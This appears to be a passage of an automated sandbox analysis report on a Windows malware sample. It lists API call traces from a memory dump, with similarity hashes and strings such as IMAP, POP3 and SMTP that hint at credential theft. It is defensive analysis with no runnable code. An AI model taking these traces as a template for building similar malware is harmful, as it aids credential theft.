    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
